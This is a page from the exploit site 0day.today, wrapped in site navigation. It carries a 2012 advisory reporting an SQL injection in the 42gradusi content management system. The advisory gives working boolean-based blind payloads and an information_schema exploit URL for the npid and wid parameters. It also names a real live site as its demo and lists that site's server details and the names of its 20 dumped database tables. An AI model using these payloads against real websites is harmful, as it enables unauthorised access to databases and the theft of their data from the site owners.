0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
42gradusi - SQL injection Vulnerability
Title: ====== 42gradusi - SQL injection Vulnerability Date: ===== 2012-06-20 ======= I'm cheki Member From Inj3ct0r TEAM ======= Introduction: ============= 42 GRADUSI developed a unique capability product for Georgia digital narket- 42 CMS, Content Management System that helps our clients to keep their websites in control. Currently it works for sites operating on both PHP and FLASH platforms. Vendor Homepage: http://www.42gradusi.com/ Report-Timeline: ================ 2012-06-20 Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] npid AND wid PoC: http://<TARGET>/?action=news&lang=geo&npid=[SQL] http://<TARGET>/?action=info&wid=[SQL] Risk: The security risk of the sql injection vulnerability is estimated as high. Server information: web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.9 ===== Payload: wid=867 AND 7656=7656 Payload: npid=235 AND 2982=2982 ===== Exploit: http://<TARGET>:80/?action=news&lang=geo&npid=-235+SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='db_name'--+ ======================================== Demo:www.worksale.ge Place: POST Parameter: wid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: wid=867 AND 7656=7656 Database: worksale [20 tables] +----------------------+ | content | | content_types | | link | | menu | | module_news | | module_tenders | | redirect | | users | | users_types | | worksale | | worksale_category | | worksale_color | | worksale_erteuli | | worksale_momsaxureba | | worksale_qveknebi | | worksale_ra | | worksale_rent | | worksale_sacvavi | | worksale_users | | worksale_valuta | +----------------------+ =========================================== - Special Thanks: 1337day - Inj3ct0r TEAM AND Anuka Bolqvadze # 0day.today [2024-07-02] #